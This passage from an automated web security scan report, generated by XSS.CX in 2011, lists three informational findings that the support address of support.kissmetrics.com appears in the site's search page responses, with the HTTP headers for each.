...[SNIP]...

3.17. http://support.kissmetrics.com/search/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/a

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:48:31 GMT
Last-Modified: Sun, 28 Aug 2011 20:48:30 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 14708
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.18. http://support.kissmetrics.com/search/cookie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/cookie

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:53 GMT
Last-Modified: Sun, 28 Aug 2011 20:39:51 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 12570
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

3.19. http://support.kissmetrics.com/search/xss previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://support.kissmetrics.com
Path:	/search/xss

Issue detail

The following email address was disclosed in the response:

support@kissmetrics.com

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html
Date: Sun, 28 Aug 2011 20:39:42 GMT
Last-Modified: Sun, 28 Aug 2011 20:39:41 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 6890
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns='http://www.w3.org/1999/xhtml'>
<head>

...[SNIP]...
<a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a>
...[SNIP]...

Report generated by XSS.CX at Sun Aug 28 17:38:43 GMT-06:00 2011.